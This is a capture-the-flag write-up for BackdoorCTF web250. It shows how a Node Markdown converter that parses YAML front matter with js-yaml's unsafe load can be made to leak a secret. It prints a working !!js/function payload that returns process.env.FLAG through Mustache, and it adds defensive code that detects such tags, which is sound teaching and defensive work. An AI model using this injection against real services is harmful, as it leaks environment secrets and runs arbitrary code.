Templatized
BackdoorCTF - web - 250

Challenge Text

Markdown to HTML Convertor

Our special markdown convertor supports yaml-frontmatter and underscore style templating.
https://backdoor-web250.herokuapp.com/


This problem is almost identical to another BackdoorCTF web100 challenge and also provides its source code.

<html>
    <head>
        <title>Markdown to HTML Convertor</title>
        <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style>
    </head>
    <body>
        <h1>Markdown to HTML Convertor</h1>
        <form action="/convert" method="POST">
            <p>Our special markdown convertor supports yaml-frontmatter and underscore style templating.</p>
            <textarea name="markdown" rows="30" cols="70" placeholder="Enter markdown here">...</textarea>
            <br>
            <input type="submit" value="Convert!">
        </form>
        <p>Source code for this is available at https://github.com/backdoor-ctf/web250</p>
    </body>
</html>

Just like the previous problem, app.js reads the flag from the process.env.FLAG variable, which is what we need to leak again:

// development only
if ('development' == app.get('env')) {
  app.use(express.errorHandler());
}
if(!process.env.FLAG)
{
  console.error("No flag in environment");
  process.exit(1);
}

index.js handles parsing/processing submitted content...

var md = require( "markdown" ).markdown;
var yml = require('js-yaml');
Mustache=require("mustache");

exports.index = function(req, res){
  res.sendfile("public/index.html");
};

exports.convert = function(req, res){
  var markdown = req.body.markdown;
  var yaml = '';
  var data = null;
  if(markdown.slice(0,3)==='---')
  {
    var end = markdown.indexOf('---',3);
    if(end>-1){
        yaml = markdown.slice(3,end);
        try{
          data = yml.load(yaml);
        }
        catch(e){
          res.send("Incorrect YAML");
          return;
        }
        markdown = markdown.slice(end+3);
    }
    //No closing --- were found
    else
        markdown=markdown.slice(3);
  }
  //Now we template it up:
  var content = Mustache.render(markdown, data)
  res.send(md.toHTML(content));
};

The most important line of code here is "data = yml.load(yaml);", since it shows exactly how the front matter is processed. A quick read through the js-yaml README on GitHub turned up a very interesting description of yml.load: unlike safeLoad, it uses DEFAULT_FULL_SCHEMA, which adds the JavaScript-specific tags !!js/function, !!js/regexp and !!js/undefined, and the README warns that with untrusted sources you must additionally validate the object structure to avoid injections.

Don't mind if I do...

---
function: !!js/function >
  function foobar() {
    return process.env.FLAG;
  }
---
{{function}}

Flag: fb1f85e4f37eb3bf31141cb1dcce1caf
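For the defender's side of this, here is an added example (my own code, not part of the challenge or the original writeup) that reproduces the handler's front-matter slicing and then refuses any YAML document carrying a js-yaml JavaScript tag before it reaches a loader. The real fix is to parse with the safe schema (yml.safeLoad in js-yaml 3.x, or load with DEFAULT_SAFE_SCHEMA / JSON_SCHEMA), since the chain only works because load resolves !!js/function and Mustache then invokes function-valued view members as lambdas; the check below is a request-inspection layer you can log from or block on in front of that. The sample inputs, the function names and the tag patterns are mine.

```javascript
'use strict';
// Added example, not the challenge's code: mirror the vulnerable handler's
// front-matter parsing, then flag js-yaml JavaScript tags before loading.

// Same slicing rules as the original convert handler: a leading '---' opens
// the front matter and the next '---' closes it; no closing marker means
// the leading '---' is simply dropped.
function splitFrontMatter(markdown) {
  if (markdown.slice(0, 3) !== '---') {
    return { yaml: '', body: markdown };
  }
  const end = markdown.indexOf('---', 3);
  if (end === -1) {
    return { yaml: '', body: markdown.slice(3) };
  }
  return { yaml: markdown.slice(3, end), body: markdown.slice(end + 3) };
}

// Tags that DEFAULT_FULL_SCHEMA resolves into live JavaScript values, in both
// the '!!js/...' shorthand and the expanded 'tag:yaml.org,2002:js/...' form.
const JS_TAG_PATTERNS = [
  /!!js\//i,
  /!<\s*tag:yaml\.org,2002:js\//i,
];

// Returns the source of every pattern that matched, so the verdict is explainable.
function findJsTags(yaml) {
  return JS_TAG_PATTERNS.filter((re) => re.test(yaml)).map((re) => re.source);
}

// Verdict object a front-end guard or a log pipeline can act on.
function inspectSubmission(markdown) {
  const { yaml, body } = splitFrontMatter(markdown);
  const reasons = findJsTags(yaml);
  return { yaml, body, blocked: reasons.length > 0, reasons };
}

// Constructed sample submissions: an ordinary document and the writeup's payload.
const BENIGN = '---\ntitle: Hello\nauthor: kelson\n---\n# {{title}}\n';
const HOSTILE =
  '---\nfunction: !!js/function >\n  function foobar() {\n' +
  '    return process.env.FLAG;\n  }\n---\n{{function}}\n';

for (const sample of [BENIGN, HOSTILE]) {
  const verdict = inspectSubmission(sample);
  console.log(verdict.blocked ? 'BLOCKED' : 'allowed', verdict.reasons);
}
```

Run it with node and the benign document is allowed while the writeup's payload is blocked with the pattern that matched. Treat the regexes as a detection signal rather than a security boundary: a tag-rejecting schema in the loader is what actually removes the capability.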


- Kelson (kelson@shysecurity.com)